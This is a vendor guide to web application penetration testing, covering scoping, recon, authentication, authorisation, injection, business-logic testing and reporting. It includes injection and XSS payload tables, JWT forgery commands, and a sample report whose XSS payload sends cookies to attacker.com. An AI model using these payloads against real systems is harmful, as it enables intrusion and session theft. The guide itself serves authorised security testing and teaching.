Web application penetration testing is a systematic simulation of how a real attacker would approach your web application. Unlike a vulnerability scan — which identifies known weaknesses using signatures — a pentest uses human intelligence and attacker techniques to discover, chain, and exploit vulnerabilities that automated tools routinely miss.
This guide documents the methodology used by professional web application penetration testers, step by step, from initial scoping to final report. It’s written for security engineers, development teams, and security leaders who want to understand what happens during an engagement — and how to make the most of one.
Phase 0: Scoping and Rules of Engagement
A pentest without a well-defined scope is a liability. Before any testing begins, establish:
Scope Definition
In-scope targets:
- Application URLs and domains (e.g., app.example.com, api.example.com)
- Specific user roles to test (unauthenticated, standard user, admin, API consumer)
- Mobile apps, if any
- Third-party integrations (SSO providers, payment gateways)
Out-of-scope:
- Third-party services you don’t own (be specific about subdomains)
- Production databases if testing in a non-prod environment
- Social engineering (unless explicitly agreed)
- Denial of service testing
Testing type:
- Black box: No prior knowledge — simulate an external, unauthenticated attacker
- Grey box: Partial knowledge (accounts, some architecture) — most efficient for web apps
- White box: Full access (source code, architecture docs) — deepest coverage. Pair with source code security review for maximum assurance
Authorisation
Get written authorisation before touching anything. This is non-negotiable — a penetration test without written authorisation is unauthorised access, regardless of intent. The authorisation should:
- Name the specific systems and URLs in scope
- Define the testing window (start and end dates/times)
- Specify permitted and prohibited testing techniques
- Include contact information for emergency escalation
Emergency Contacts
Define who to call if:
- The tester discovers evidence of an active compromise (not theirs) during testing
- Testing causes unintended disruption to production systems
- A critical vulnerability is found that needs immediate remediation
Phase 1: Reconnaissance
Reconnaissance is intelligence gathering — understanding the target before touching it. Split into passive (no direct interaction with the target) and active (interacting with the target).
Passive Reconnaissance
OSINT (Open Source Intelligence):
# DNS enumeration with passive sources
subfinder -d example.com -o subdomains.txt
amass enum -passive -d example.com >> subdomains.txt
# Historical DNS records
# e.g. dnshistory.org, securitytrails.com, viewdns.info
# Certificate transparency logs (find subdomains from TLS certs)
curl -s "https://crt.sh/?q=%.example.com&output=json" | jq -r '.[].name_value' | sort -u
# Google dorking
site:example.com filetype:pdf
site:example.com inurl:admin
site:example.com "internal use only"
"@example.com" site:linkedin.com # employee enumeration
# Technology fingerprinting
# Check Wappalyzer, BuiltWith — what tech stack is in use?
# Shodan (for exposed infrastructure)
shodan search "hostname:example.com"
shodan search "ssl:example.com"
# Wayback Machine (historical content, old endpoints, old config files)
gau example.com | grep -v "\.js\|\.css\|\.png\|\.jpg" | sort -u
# GitHub/GitLab code search
# Search for hardcoded API keys, config files, internal domains
What you’re looking for:
- Subdomains (staging, dev, api, admin, legacy)
- Technology stack (framework, server, CDN)
- Employee names and email formats (useful for targeted attacks)
- Exposed credentials in code repositories
- Historical endpoints no longer linked from the main app
Active Reconnaissance
Once you’re within the testing window:
# Port scanning (agreed-scope IPs/domains only)
nmap -sS -sV -p- --min-rate 5000 --open -oA nmap-scan app.example.com
# Web crawling
katana -u https://app.example.com -d 5 -jc -o crawl-results.txt
gospider -s https://app.example.com -d 3 -o ./spider-output
# Directory and file enumeration
ffuf -u https://app.example.com/FUZZ -w /path/to/SecLists/Discovery/Web-Content/raft-large-files.txt \
-fc 404 -fs 0 -mc all -o dir-brute.json
# API endpoint discovery
kiterunner scan https://api.example.com -w routes-large.kite
# JavaScript analysis (extract API endpoints, secrets, internal URLs)
# Download all JS files from spider results
# Analyse with LinkFinder, SecretFinder
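The endpoint-extraction step that LinkFinder performs can be sketched in a few lines of Python; the regex and sample below are deliberately narrow and illustrative, not a replacement for the tool's more thorough parsing:

```python
import re

# Rough sketch of LinkFinder-style extraction: pull relative API paths
# out of downloaded JavaScript bundles. Pattern is illustrative only.
ENDPOINT_RE = re.compile(r"""["'](/(?:api|v\d)[A-Za-z0-9_/.\-]*)["']""")

def extract_endpoints(js_source):
    # Deduplicate and sort the candidate paths found in the source
    return sorted(set(ENDPOINT_RE.findall(js_source)))

sample = 'fetch("/api/users"); axios.get("/v1/admin/export");'
print(extract_endpoints(sample))  # ['/api/users', '/v1/admin/export']
```

Run this over every bundle the spider downloads, then feed the resulting paths back into the directory-enumeration and authorisation-testing phases.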
Phase 2: Authentication and Session Testing
Authentication is typically the highest-value target. A bypass here gives attacker-level access to everything protected by it.
Login Endpoint Analysis
1. What authentication mechanisms exist?
- Username/password
- OAuth2/OIDC (SSO)
- API keys
- Magic links
2. Username enumeration
- Do error messages differ for "user not found" vs "wrong password"?
- Is there timing difference? (blind enumeration via response time)
- Does "forgot password" confirm whether an email exists?
3. Brute force protections
- What happens after N failed attempts?
- Is there a lockout, CAPTCHA, or rate limit?
- Is the limit per-IP, per-account, or both?
- Can it be bypassed with X-Forwarded-For header manipulation?
4. Password policy
- Minimum length?
- Is "password123" accepted?
5. MFA implementation
- Is MFA bypass possible (skip the MFA step entirely)?
- Is the MFA code validated server-side?
- Can codes be brute-forced (are they rate-limited)?
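The timing check in step 2 can be scripted. This is a minimal sketch: in a real test the timings come from repeated login attempts against the target, whereas the values and the 50 ms threshold below are synthetic, for illustration only:

```python
import statistics

def likely_enumerable(valid_ms, invalid_ms, threshold_ms=50):
    """Flag a possible timing oracle: if median response times for
    existing vs non-existing usernames differ by more than the
    threshold, the login endpoint may leak account existence."""
    delta = abs(statistics.median(valid_ms) - statistics.median(invalid_ms))
    return delta > threshold_ms

valid = [410, 425, 418, 432, 409]    # ms: user exists, password hash is checked
invalid = [120, 131, 118, 125, 122]  # ms: user not found, early return
print(likely_enumerable(valid, invalid))  # True
```

Medians rather than means keep one slow outlier (GC pause, network jitter) from producing a false positive; collect enough samples per username to make the comparison meaningful.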
Session Token Analysis
Capture session tokens from authenticated sessions, then:
# Analyse token entropy (should look random, not predictable)
# Decode JWTs
jwt_tool <token>
# Test JWT attacks
jwt_tool <token> -T # Tamper mode
jwt_tool <token> -X a # alg:none attack
jwt_tool <token> -C -d /path/to/wordlist # Crack weak signing key
# Session fixation — does the session token change after login?
# Set session cookie before login, log in, does the same token persist?
# Session invalidation — does logout actually invalidate the server-side session?
# Capture session token, logout, try to use the token again
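The jwt_tool checks above start from an unverified decode of the token's header and payload; the same inspection can be done by hand. A sketch, with the example token built inline purely for illustration:

```python
import base64
import json

def decode_jwt_unverified(token):
    """Decode a JWT's header and payload WITHOUT verifying the
    signature -- enough to inspect alg and claims during testing."""
    def b64url_json(seg):
        # Re-pad base64url segments before decoding
        return json.loads(base64.urlsafe_b64decode(seg + "=" * (-len(seg) % 4)))
    header_b64, payload_b64, _sig = token.split(".")
    return b64url_json(header_b64), b64url_json(payload_b64)

def b64url(d):  # helper only used to build the example token below
    return base64.urlsafe_b64encode(json.dumps(d).encode()).rstrip(b"=").decode()

token = f'{b64url({"alg": "HS256"})}.{b64url({"sub": "1", "role": "user"})}.sig'
header, claims = decode_jwt_unverified(token)
print(header["alg"], claims["role"])  # HS256 user
```

An `alg` of `HS256` with a guessable secret, or claims like `role` that the server trusts without re-checking, are the starting points for the tamper and cracking attacks above.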
Phase 3: Authorisation Testing
Authorisation testing is where significant business impact is most often found. Two accounts are required for most tests.
IDOR (Insecure Direct Object Reference) Testing
For every endpoint that returns or modifies a specific resource:
1. Note the resource ID (numeric, UUID, slug)
2. Create a second test account
3. Capture the second account's resource IDs
4. Use account A's session to request account B's resources
5. Does the server return/allow modification?
Example:
Account A: GET /api/projects/8824 → returns project data
Account B owns project 9141
Test: GET /api/projects/9141 with Account A's token → should return 403, not project data
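When testing many endpoints, the cross-account check above can be wrapped in a small classifier. A sketch: the `marker` is any string known to belong only to account B (for example B's email address), and the status buckets are illustrative:

```python
def idor_verdict(status_code, body, marker):
    """Classify the response when account A requests account B's resource."""
    if 200 <= status_code < 300 and marker in body:
        return "VULNERABLE"  # B's data was returned to A
    if status_code in (401, 403, 404):
        return "ok"          # access denied (or resource hidden)
    return "review"          # ambiguous response, inspect manually

print(idor_verdict(200, '{"owner": "bob@example.com"}', "bob@example.com"))
# VULNERABLE
```

Treat "review" results seriously: a 200 with an empty body, or a 302 to an error page, can still mask partial data exposure.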
Automate this with Burp Suite’s Autorize extension — it replays every request in the proxy history with a different session token and flags differences in response.
Privilege Escalation Testing
1. Horizontal escalation: Account A accessing Account B's data (IDOR)
2. Vertical escalation: Regular user accessing admin functions
For vertical escalation:
- Try admin API endpoints with regular user credentials
- Modify request parameters: role=user → role=admin
- Try adding admin headers (X-Admin: true, X-User-Role: admin)
- Access admin UI pages directly (not just via navigation)
Phase 4: Input Validation and Injection Testing
Every input is a potential injection point. Test systematically:
Injection Testing Matrix
For every user-controlled input (form fields, URL parameters, headers, cookies, JSON/XML body):
| Test | Payload Example | What You’re Looking For |
|---|---|---|
| SQL Injection | ' OR '1'='1, 1; SELECT sleep(5)-- | DB errors, timing differences, extra data |
| NoSQL Injection | {"$gt": ""}, {"$where": "sleep(3000)"} | Auth bypass, data exposure |
| Command Injection | ; whoami, $(id), `id` | RCE indicators in response |
| Template Injection | {{7*7}}, ${7*7}, <%= 7*7 %> | 49 returned = SSTI |
| Path Traversal | ../../etc/passwd, ..%2F..%2Fetc%2Fpasswd | File contents in response |
| SSRF | http://169.254.169.254/, http://internal.service/ | Internal data returned |
| XXE | <!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]> | File contents in response |
| CRLF Injection | %0d%0aHeader: Value | Header injected in response |
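The SSTI row relies on a simple arithmetic oracle. As a sketch, the check must distinguish an evaluated probe from a literal echo, since a safe application reflects the payload back unchanged:

```python
def ssti_suspected(probe, response_body):
    """A template engine that *evaluates* the probe returns 49;
    a safe application echoes the payload back literally."""
    return "49" in response_body and probe not in response_body

print(ssti_suspected("{{7*7}}", "Hello, 49!"))       # True
print(ssti_suspected("{{7*7}}", "Hello, {{7*7}}!"))  # False
```

Which probe syntax fires ({{7*7}} vs ${7*7} vs <%= 7*7 %>) also fingerprints the template engine, which matters for building an exploitation payload.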
XSS Testing
// Basic reflected XSS probes
<script>alert(1)</script>
<img src=x onerror=alert(1)>
"><script>alert(1)</script>
javascript:alert(1)
"><img src=x onerror=alert(document.domain)>
// DOM XSS — look at JavaScript code for dangerous sinks
element.innerHTML
document.write
eval()
setTimeout(user_input)
location.href = user_input
For stored XSS: submit payloads in all user-controllable fields that are later rendered to other users (profile names, comments, titles, custom fields).
Phase 5: Business Logic Testing
Business logic vulnerabilities require understanding your application’s specific workflows. They cannot be found by automated scanners.
Common Business Logic Flaws
Multi-step flow bypass:
1. Map every multi-step process (checkout, signup, verification, approval)
2. Try accessing later steps directly without completing earlier ones
3. Try re-submitting completed steps (replay attacks)
4. Try completing steps in a different order
Race conditions:
# Test concurrent requests for resource-limited operations
# (base_url and token are placeholders for the target and an authenticated session)
import threading
import requests
results = []
def claim_resource():
    r = requests.post(base_url + '/api/claim-voucher',
                      json={'code': 'LIMITEDONE'},
                      headers={'Authorization': 'Bearer ' + token})
    results.append(r.status_code)
threads = [threading.Thread(target=claim_resource) for _ in range(20)]
[t.start() for t in threads]
[t.join() for t in threads]
# If more than one 2xx comes back, the claim is not atomic → race condition
print(sum(200 <= s < 300 for s in results))
Price and quantity manipulation:
- Negative quantities in cart
- Zero-price items
- Discount codes applied multiple times
- Currency rounding exploitation
- Coupon stacking when only one should be allowed
Phase 6: API-Specific Testing
Modern web applications are API-first. Our API penetration testing service covers this in depth — summary of key tests:
- GraphQL introspection and schema enumeration
- Mass assignment in PUT/PATCH requests
- HTTP method tampering (GET endpoint accepting DELETE)
- Parameter pollution (sending duplicate parameters)
- Verb tampering (OPTIONS, TRACE, HEAD revealing internal information)
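The mass-assignment test from the list above can be sketched as follows: take a legitimate update body captured from the UI and add privileged fields the client never sends (the field names here are hypothetical; harvest real ones from API responses and JS bundles), then check whether the server persists them:

```python
import json

# Legitimate body captured from the UI
legit = {"display_name": "Alice"}

# Probe: add privileged fields the client never sends
# (names are hypothetical examples)
probe = {**legit, "role": "admin", "is_verified": True}

body = json.dumps(probe)
print(body)
# Send `body` with the normal session via PUT/PATCH, then GET the
# resource back and diff: did role or is_verified change?
```

Frameworks that bind request JSON directly to ORM models (without an allow-list of writable fields) are the usual culprits.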
Phase 7: Infrastructure and Configuration Testing
Beyond the application itself:
# HTTP security headers
curl -I https://app.example.com | grep -i "strict-transport\|x-content\|x-frame\|content-security\|referrer"
# TLS configuration
testssl.sh https://app.example.com
sslyze --regular app.example.com
# Information disclosure
# Check for: stack traces, version numbers in responses, debug headers
# robots.txt, sitemap.xml — may reveal hidden paths
# .git/ exposed? — git history may contain secrets
curl https://app.example.com/.git/HEAD
# .env, config.php, database.yml exposed?
curl https://app.example.com/.env
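The header check above can be scripted for repeatable coverage; the required list below is a reasonable baseline, not an exhaustive standard:

```python
# Baseline security headers to expect on an HTML response
REQUIRED = [
    "strict-transport-security",
    "content-security-policy",
    "x-content-type-options",
    "x-frame-options",
    "referrer-policy",
]

def missing_security_headers(headers):
    """Return the baseline headers absent from a response's header dict."""
    present = {k.lower() for k in headers}
    return [h for h in REQUIRED if h not in present]

resp_headers = {"Content-Type": "text/html", "X-Frame-Options": "DENY"}
print(missing_security_headers(resp_headers))
# ['strict-transport-security', 'content-security-policy',
#  'x-content-type-options', 'referrer-policy']
```

Feed it the header dict from any HTTP client (e.g. `requests.get(url).headers`); header names are compared case-insensitively, as HTTP requires.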
Phase 8: Post-Exploitation (Within Agreed Scope)
When access is achieved, demonstrate business impact:
1. What data can be accessed?
- Other users' data (PII, financial records, communications)
- Admin data (configurations, all user accounts)
- Internal infrastructure information
2. What actions can be performed?
- Can we modify another user's data?
- Can we escalate to admin?
- Can we exfiltrate data at scale?
3. Document without causing harm
- Do not exfiltrate real user data — capture screenshots with minimal real data visible
- Do not destroy data
- Do not persist access (no backdoors, no changed passwords)
- Document the attack chain precisely for the report
Phase 9: Reporting
The report is what the client pays for. A poor report negates a strong technical finding.
Executive Summary
Non-technical. Maximum 1–2 pages. Covers:
- Overall risk rating (Critical / High / Medium / Low)
- Number of findings by severity
- Key themes and most impactful findings in plain language
- Business risk narrative — what could happen if these aren’t fixed
- Top 3 recommended immediate actions
Technical Findings
For each finding:
Finding: Stored XSS via Profile Display Name
| Field | Value |
|---|---|
| Severity | High |
| CVSS Score | 6.8 (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:N/A:N); severity raised to High given admin-session impact |
| Affected Endpoint | PUT /api/users/profile → GET /api/users/{id} |
| CWE | CWE-79: Improper Neutralisation of Input During Web Page Generation |
Description: The display_name field in user profile update requests is not sanitised before being rendered in the admin user list view. An authenticated user can inject arbitrary JavaScript that executes in admin sessions.
Steps to Reproduce:
- Authenticate as a standard user
- Send PUT /api/users/profile with body {"display_name": "<img src=x onerror=fetch('https://attacker.com/?c='+document.cookie)>"}
- An administrator views the user list
- The JavaScript executes in the admin’s browser, exfiltrating their session cookie
Impact: An attacker could steal administrator session cookies, gain admin-level access, and access all user data, configuration settings, and sensitive system information.
Remediation:
- Encode all user-supplied data when rendering in HTML contexts (use template engine auto-escaping, or htmlspecialchars() in PHP, DOMPurify for rich text)
- Implement a Content Security Policy (CSP) as defence in depth
- Apply the HttpOnly flag to admin session cookies to prevent cookie theft via XSS
Attack Narrative
Walk through the most impactful attack chain as a story:
“Starting from an unauthenticated position, the tester enumerated the application’s API endpoints and discovered an undocumented endpoint at /api/v1/admin/users/export. Authentication was required, but the endpoint accepted a JWT token with modified claims. Using a known-weak signing key attack, the tester forged an admin JWT token. The endpoint returned a CSV file containing all 14,000 registered user records including names, email addresses, and hashed passwords.”
This narrative form communicates impact to executives far more effectively than a list of technical findings.
Remediation Roadmap
Don’t just list what’s broken. Provide a prioritised action plan:
| Priority | Finding | Effort | Impact |
|---|---|---|---|
| 1 (Immediate) | Stored XSS in admin panel | Low — 4 hours | Critical |
| 2 (This Sprint) | IDOR on invoice API | Low — 2 hours | High |
| 3 (This Sprint) | No rate limiting on login | Low — 1 hour | High |
| 4 (Next Sprint) | Missing security headers | Low — 2 hours | Medium |
| 5 (Quarterly) | JWT library upgrade | Medium — 1 week | Medium |
Making the Most of a Pentest Engagement
To get maximum value:
Before the test:
- Ensure test accounts are created with relevant roles and data
- Have developers available to answer questions during the test
- Decide whether to inform your SOC (blue team) or test their detection capability simultaneously
During the test:
- Create a shared channel (Slack/Teams) with the testers for quick communication
- Brief daily stand-ups help track progress and redirect effort to high-value areas
- Share architecture documentation in grey/white box engagements — testers who understand the system find more
After the test:
- Schedule a debrief session to walk through findings with technical teams
- Prioritise remediation using the roadmap
- Schedule a retest to validate fixes
- Use findings to update your threat model and developer security training
CyberneticsPlus conducts web application penetration testing following OWASP, PTES, and custom methodology refined through hundreds of engagements. We also offer API penetration testing and source code security review for comprehensive coverage. Contact us to scope your next assessment.